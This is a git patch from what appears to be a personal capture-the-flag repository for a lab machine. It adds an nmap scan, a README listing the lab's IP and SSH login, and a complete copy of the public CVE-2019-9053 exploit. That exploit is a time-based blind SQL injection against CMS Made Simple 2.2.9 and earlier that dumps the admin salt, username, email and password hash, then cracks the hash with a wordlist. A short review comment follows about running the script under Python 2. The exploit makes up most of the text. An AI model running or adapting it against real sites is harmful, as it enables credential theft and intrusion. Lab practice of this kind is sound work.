From 71dd1dc672fb230428ed3662f59b552eac70d215 Mon Sep 17 00:00:00 2001
From: Raghuram Subramani
Date: Tue, 1 Mar 2022 14:47:08 +0530
Subject: add rooms
---
SimpleCTF/ForMitch.txt | 1 +
SimpleCTF/README.md | 7 ++
SimpleCTF/exploit.py | 186 +++++++++++++++++++++++++++++++++++++++++++++++++
SimpleCTF/nmap/initial | 35 ++++++++++
4 files changed, 229 insertions(+)
create mode 100644 SimpleCTF/ForMitch.txt
create mode 100644 SimpleCTF/README.md
create mode 100644 SimpleCTF/exploit.py
create mode 100644 SimpleCTF/nmap/initial
(limited to 'SimpleCTF')
diff --git a/SimpleCTF/ForMitch.txt b/SimpleCTF/ForMitch.txt
new file mode 100644
index 0000000..596c727
--- /dev/null
+++ b/SimpleCTF/ForMitch.txt
@@ -0,0 +1 @@
+Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
diff --git a/SimpleCTF/README.md b/SimpleCTF/README.md
new file mode 100644
index 0000000..b0465a6
--- /dev/null
+++ b/SimpleCTF/README.md
@@ -0,0 +1,7 @@
+IP address >`10.10.73.108`
+
+SSH >
+```
+mitch
+secret
+```
\ No newline at end of file
diff --git a/SimpleCTF/exploit.py b/SimpleCTF/exploit.py
new file mode 100644
index 0000000..260e4e7
--- /dev/null
+++ b/SimpleCTF/exploit.py
@@ -0,0 +1,186 @@
+#!/usr/bin/env python3
+# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
+# Date: 30-03-2019
+# Exploit Author: Daniele Scanu @ Certimeter Group
+# Vendor Homepage: https://www.cmsmadesimple.org/
+# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
+# Version: <= 2.2.9
+# Tested on: Ubuntu 18.04 LTS
+# CVE : CVE-2019-9053
+
+import requests
+from termcolor import colored
+import time
+from termcolor import cprint
+import optparse
+import hashlib
+
+parser = optparse.OptionParser()
+parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
+parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
+parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)
+
+options, args = parser.parse_args()
+if not options.url:
+ print "[+] Specify an url target"
+ print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
+ print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
+ print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
+ exit() + +url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0' +session = requests.Session() +dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$' +flag = True +password = "" +temp_password = "" +TIME = 1 +db_name = "" +output = "" +email = "" + +salt = '' +wordlist = "" +if options.wordlist: + wordlist += options.wordlist + +def crack_password(): + global password + global output + global wordlist + global salt + dict = open(wordlist) + for line in dict.readlines(): + line = line.replace("\n", "") + beautify_print_try(line) + if hashlib.md5(str(salt) + line).hexdigest() == password: + output += "\n[+] Password cracked: " + line + break + dict.close() + +def beautify_print_try(value): + global output + print "\033c" + cprint(output,'green', attrs=['bold']) + cprint('[*] Try: ' + value, 'red', attrs=['bold']) + +def beautify_print(): + global output + print "\033c" + cprint(output,'green', attrs=['bold']) + +def dump_salt(): + global flag + global salt + global output + ord_salt = "" + ord_salt_temp = "" + while flag: + flag = False + for i in range(0, len(dictionary)): + temp_salt = salt + dictionary[i] + ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:] + beautify_print_try(temp_salt) + payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+" + url = url_vuln + "&m1_idlist=" + payload + start_time = time.time() + r = session.get(url) + elapsed_time = time.time() - start_time + if elapsed_time >= TIME: + flag = True + break + if flag: + salt = temp_salt + ord_salt = ord_salt_temp + flag = True + output += '\n[+] Salt for password found: ' + salt + +def dump_password(): + global flag + global password + global output + ord_password = "" + ord_password_temp = "" + while flag: + flag = False + for i in range(0, len(dictionary)): + temp_password = password + dictionary[i] + ord_password_temp = 
ord_password + hex(ord(dictionary[i]))[2:] + beautify_print_try(temp_password) + payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users" + payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+" + url = url_vuln + "&m1_idlist=" + payload + start_time = time.time() + r = session.get(url) + elapsed_time = time.time() - start_time + if elapsed_time >= TIME: + flag = True + break + if flag: + password = temp_password + ord_password = ord_password_temp + flag = True + output += '\n[+] Password found: ' + password + +def dump_username(): + global flag + global db_name + global output + ord_db_name = "" + ord_db_name_temp = "" + while flag: + flag = False + for i in range(0, len(dictionary)): + temp_db_name = db_name + dictionary[i] + ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:] + beautify_print_try(temp_db_name) + payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+" + url = url_vuln + "&m1_idlist=" + payload + start_time = time.time() + r = session.get(url) + elapsed_time = time.time() - start_time + if elapsed_time >= TIME: + flag = True + break + if flag: + db_name = temp_db_name + ord_db_name = ord_db_name_temp + output += '\n[+] Username found: ' + db_name + flag = True + +def dump_email(): + global flag + global email + global output + ord_email = "" + ord_email_temp = "" + while flag: + flag = False + for i in range(0, len(dictionary)): + temp_email = email + dictionary[i] + ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:] + beautify_print_try(temp_email) + payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+" + url = url_vuln + "&m1_idlist=" + payload + start_time = time.time() + r = session.get(url) + elapsed_time = time.time() - start_time + if elapsed_time >= TIME: + flag = True + break + if flag: + 
email = temp_email + ord_email = ord_email_temp + output += '\n[+] Email found: ' + email + flag = True + +dump_salt() +dump_username() +dump_email() +dump_password() + +if options.cracking: + print colored("[*] Now try to crack password") + crack_password() + +beautify_print() \ No newline at end of file diff --git a/SimpleCTF/nmap/initial b/SimpleCTF/nmap/initial new file mode 100644 index 0000000..3ae0e7d --- /dev/null +++ b/SimpleCTF/nmap/initial @@ -0,0 +1,35 @@ +# Nmap 7.80 scan initiated Mon Feb 28 21:34:09 2022 as: nmap -sC -sV -oN nmap/initial 10.10.73.108 +Nmap scan report for 10.10.73.108 +Host is up (0.19s latency). +Not shown: 997 filtered ports +PORT STATE SERVICE VERSION +21/tcp open ftp vsftpd 3.0.3 +| ftp-anon: Anonymous FTP login allowed (FTP code 230) +|_Can't get directory listing: TIMEOUT +| ftp-syst: +| STAT: +| FTP server status: +| Connected to ::ffff:10.17.36.210 +| Logged in as ftp +| TYPE: ASCII +| No session bandwidth limit +| Session timeout in seconds is 300 +| Control connection is plain text +| Data connections will be plain text +| At session startup, client count was 3 +| vsFTPd 3.0.3 - secure, fast, stable +|_End of status +80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) +| http-robots.txt: 2 disallowed entries +|_/ /openemr-5_0_1_3 +|_http-server-header: Apache/2.4.18 (Ubuntu) +|_http-title: Apache2 Ubuntu Default Page: It works +2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA) +| 256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA) +|_ 256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519) +Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Mon Feb 28 21:35:07 2022 -- 1 IP address (1 host up) scanned in 57.41 seconds -- cgit v1.2.3
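Review bot: exploit.py opens with `#!/usr/bin/env python3` but the body is Python 2 — the `print "[+] ..."` statements under `if not options.url:`, the `print "\033c"` in beautify_print_try and beautify_print, and `print colored(...)` at the bottom are syntax errors on Python 3, and `hashlib.md5(str(salt) + line)` in crack_password passes a str where Python 3's hashlib requires bytes. Since the file is a verbatim copy of the public CVE-2019-9053 PoC with its attribution header kept, the least invasive fix is to run it as written: change the first line to `#!/usr/bin/env python2` and record the interpreter and the undeclared third-party `termcolor` dependency in the README rather than porting the script. In crack_password, `dict = open(wordlist)` shadows the builtin and the handle is never closed if the loop raises; `with open(wordlist) as wordlist_file:` fixes both. `args` from `parser.parse_args()` and every `r = session.get(url)` result are assigned but never read, so they can be dropped.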